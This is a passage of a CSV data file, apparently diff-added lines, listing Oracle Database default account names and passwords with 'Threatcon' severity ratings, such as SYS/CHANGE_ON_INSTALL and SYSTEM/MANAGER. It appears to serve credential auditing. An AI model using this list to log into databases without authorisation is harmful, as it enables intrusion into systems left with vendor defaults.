+oracle,Database,Any,,IPA,IPA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IPD,IPD,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IPLANET,IPLANET,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ISC,ISC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ITG,ITG,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JA,JA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JAKE,PASSWO4,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JE,JE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JG,JG,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JILL,PASSWO2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JL ,JL ,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JMUSER,JMUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JOHN,JOHN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JONES,STEEL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JTF,JTF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JTM,JTM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JTS,JTS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JWARD,AIROPLANE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,KWALKER,KWALKER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,L2LDEMO,L2LDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,LBACSYS,LBACSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,LIBRARIAN,SHELVES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MANPROD,MANPROD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MARK,PASSWO3,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MASCARM,MANAGER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MASTER,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDATA,MDDATA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDEMO,MDDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDEMO_CLERK,CLERK,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDEMO_CLERK,MGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDEMO_MGR,MDDEMO_MGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDEMO_MGR,MGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDSYS,MDSYS,Threatcon 1 (most serious),, +oracle,Database,Any,,ME,ME,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MFG,MFG,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MGR,MGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MGWUSER,MGWUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MIGRATE,MIGRATE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MILLER,MILLER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MMO2,MMO2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MMO2,MMO3,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MMO2,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MODTEST,YES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MOREAU,MOREAU,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MRP,MRP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MSC,MSC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MSD,MSD,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MSO,MSO,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MSR,MSR,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MTSSYS,MTSSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MTS_USER,MTS_PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MWA,MWA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MXAGENT,MXAGENT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NAMES,NAMES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NEOTIX_SYS,NEOTIX_SYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NNEUL,NNEULPASS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NOMEUTENTE,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NOME_UTILIZADOR,SENHA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NOM_UTILISATEUR,MOT_DE_PASSE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NUME_UTILIZATOR,PAROL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OAIHUB902,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OAS_PUBLIC,OAS_PUBLIC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OCITEST,OCITEST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OCM_DB_ADMIN,OCM_DB_ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ODM,ODM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ODM_MTR,MTRPW,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ODS,ODS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ODSCOMMON,ODSCOMMON,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ODS_SERVER,ODS_SERVER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OE,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OE,OE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OE,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OEMADM,OEMADM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OEMREP,OEMREP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OEM_REPOSITORY,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OKB,OKB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OKC,OKC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OKE,OKE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OKI,OKI,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OKO,OKO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OKR,OKR,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OKS,OKS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OKX,OKX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OLAPDBA,OLAPDBA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OLAPSVR,INSTANCE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OLAPSVR,OLAPSVR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OLAPSYS,MANAGER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OLAPSYS,OLAPSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OMWB_EMULATION,ORACLE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ONT,ONT,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OO,OO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OPENSPIRIT,OPENSPIRIT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OPI,OPI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ORACACHE,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORACACHE,ORACACHE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORACLE,ORACLE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORADBA,ORADBAPASS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORANGE,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORAPROBE,ORAPROBE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORAREGSYS,ORAREGSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASSO,ORASSO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASSO_DS,ORASSO_DS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASSO_PA,ORASSO_PA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASSO_PS,ORASSO_PS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASSO_PUBLIC,ORASSO_PUBLIC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASTAT,ORASTAT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORCLADMIN,WELCOME,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORDCOMMON,ORDCOMMON,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORDPLUGINS,ORDPLUGINS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORDSYS,ORDSYS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OSE$HTTP$ADMIN,INVALID,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OSE$HTTP$ADMIN,Invalid password,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OSM,OSM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OSP22,OSP22,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OSSAQ_HOST,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OSSAQ_PUB,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OSSAQ_SUB,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OTA,OTA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OUTLN,OUTLN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OWA,OWA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OWA_PUBLIC,OWA_PUBLIC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OWF_MGR,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OWF_MGR,OWF_MGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OWNER,OWNER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OZF,OZF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OZP,OZP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OZS,OZS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PA,PA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PANAMA,PANAMA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PATROL,PATROL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PAUL,PAUL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PERFSTAT,PERFSTAT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PERSTAT,PERSTAT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PJM,PJM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PLANNING,PLANNING,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PLEX,PLEX,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PLSQL,SUPERSECRET,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PM,PM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PM,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PMI,PMI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PN,PN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PO,PO,Threatcon 1 (most serious),, +oracle,Database,Any,,PO7,PO7,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PO8,PO8,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,POA,POA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,POM,POM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PORTAL,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30,PORTAL30,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30,PORTAL31,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_ADMIN,PORTAL30_ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_DEMO,PORTAL30_DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_PS,PORTAL30_PS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_SSO,PORTAL30_SSO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_SSO_ADMIN,PORTAL30_SSO_ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL_APP,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL_DEMO,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL_DEMO,PORTAL_DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL_PUBLIC,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL_SSO_PS,PORTAL_SSO_PS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,POS,POS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,POWERCARTUSER,POWERCARTUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PRIMARY,PRIMARY,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PSA,PSA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PSB,PSB,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PSP,PSP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PUBSUB,PUBSUB,Threatcon 1 (most serious),, +oracle,Database,Any,,PUBSUB1,PUBSUB1,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PV,PV,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,QA,QA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,QDBA,QDBA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QP,QP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,QS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS,QS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ADM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ADM,QS_ADM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ADM,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CB,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CB,QS_CB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CB,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CBADM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CBADM,QS_CBADM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CBADM,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CS,QS_CS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CS,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ES,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ES,QS_ES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ES,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_OS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_OS,QS_OS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_OS,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_WS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_WS,QS_WS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_WS,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,RE,RE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REPADMIN,REPADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REPORTS,REPORTS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REPORTS_USER,OEM_TEMP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REP_MANAGER,DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REP_OWNER,DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REP_OWNER,REP_OWNER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REP_USER,DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,RG,RG,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,RHX,RHX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,RLA,RLA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,RLM,RLM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,RMAIL,RMAIL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,RMAN,RMAN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,RRS,RRS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SAMPLE,SAMPLE,Threatcon 1 (most serious),, +oracle,Database,Any,,SAP,6071992,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SAP,SAPR3,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SAPR3,SAP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SCOTT,TIGER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SCOTT,TIGGER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SDOS_ICSAP,SDOS_ICSAP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SECDEMO,SECDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SERVICECONSUMER1,SERVICECONSUMER1,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SH,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SH,SH,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SH,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SITEMINDER,SITEMINDER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SI_INFORMTN_SCHEMA,SI_INFORMTN_SCHEMA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SLIDE,SLIDEPW,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SPIERSON,SPIERSON,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SSP,SSP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,STARTER,STARTER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,STRAT_USER,STRAT_PASSWD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SWPRO,SWPRO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SWUSER,SWUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SYMPA,SYMPA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SYS,0RACL3,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACL38,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACL38I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACL39,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACL39I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACLE,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACLE8,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACLE8I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACLE9,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACLE9I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,CHANGE_ON_INSTALL,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,D_SYSPW,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,MANAG3R,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,MANAGER,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,SYS,ORACL3,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,ORACLE,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,ORACLE8,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,ORACLE8I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,ORACLE9,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,ORACLE9I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,SYS,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,SYSPASS,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSADM,SYSADM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SYSADMIN,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SYSADMIN,SYSADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SYSMAN,OEM_TEMP,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSMAN,SYSMAN,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACL3,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACL38,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACL38I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACL39,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACL39I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACLE,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACLE8,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACLE8I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACLE9,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACLE9I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,CHANGE_ON_INSTALL,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,SYSTEM,D_SYSPW,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,D_SYSTPW,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,MANAG3R,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,MANAGER,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACL3,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACLE,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACLE8,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACLE8I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACLE9,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACLE9I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,SYSTEM,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,SYSTEMPASS,Threatcon 1 (most serious),, +oracle,Database,Any,,TAHITI,TAHITI,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TALBOT,MT6CH5,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TDOS_ICSAP,TDOS_ICSAP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TEC,TECTEC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TEST,PASSWD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TEST,TEST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TESTPILOT,TESTPILOT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TEST_USER,TEST_USER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,THINSAMPLE,THINSAMPLEPW,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TIBCO,TIBCO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TIP37,TIP37,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TRACESVR,TRACE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TRAVEL,TRAVEL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TSDEV,TSDEV,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TSUSER,TSUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TURBINE,TURBINE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,UDDISYS,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ULTIMATE,ULTIMATE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,UM_ADMIN,UM_ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,UM_CLIENT,UM_CLIENT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER,USER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER0,USER0,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER1,USER1,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER2,USER2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER3,USER3,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER4,USER4,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER5,USER5,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER6,USER6,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER7,USER7,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER8,USER8,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER9,USER9,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER_NAME,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USUARIO,CLAVE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,UTILITY,UTILITY,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,UTLBSTATU,UTLESTAT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VEA,VEA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,VEH,VEH,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,VERTEX_LOGIN,VERTEX_LOGIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VIDEOUSER,VIDEOUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VIF_DEVELOPER,VIF_DEV_PWD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VIRUSER,VIRUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VPD_ADMIN,AKF7D98S2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VRR1,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VRR1,VRR1,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VRR1,VRR2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEBCAL01,WEBCAL01,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEBDB,WEBDB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEBREAD,WEBREAD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEBSYS,MANAGER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEBUSER,YOUR_PASS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEST,WEST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WFADMIN,WFADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WH,WH,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WIP,WIP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WIRELESS,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKADMIN,WKADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKPROXY,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKPROXY,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKPROXY,WKPROXY,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKSYS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKSYS,WKSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKUSER,WKUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WK_PROXY,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WK_SYS,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WK_TEST,WK_TEST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WMS,WMS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WMSYS,WMSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WOB,WOB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WPS,WPS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WSH,WSH,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WSM,WSM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WWW,WWW,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WWWUSER,WWWUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,XADEMO,XADEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,XDB,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,XDP,XDP,Threatcon 2 